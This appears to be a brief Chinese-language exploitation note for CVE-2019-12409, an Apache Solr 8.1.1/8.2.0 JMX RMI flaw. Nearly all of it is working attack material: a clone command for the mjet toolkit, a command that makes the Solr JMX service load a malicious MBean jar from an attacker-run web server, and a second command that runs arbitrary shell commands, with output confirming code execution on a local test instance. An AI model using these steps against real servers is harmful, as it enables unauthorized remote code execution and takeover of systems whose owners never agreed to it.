参考:
https://github.com/jas502n/CVE-2019-12409
只影响8.1.1和8.2.0。
下载:
git clone https://github.com/mogwailabs/mjet
利用:
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar mjet.py 127.0.0.1 18983 install super_secret http://127.0.0.1:8000 8000
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1 3
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://127.0.0.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET /vxcrtedo.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1 4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=501(caiqiqi) gid=20(staff) groups=20(staff),501(access_bpf),701(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(com.apple.access_ssh-disabled),703(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
/Volumes/256G/Applications/solr/solr-8.2.0/server
README.txt
contexts
etc
lib
logs
modules
resources
scripts
solr
solr-webapp
start.jar
[+] Done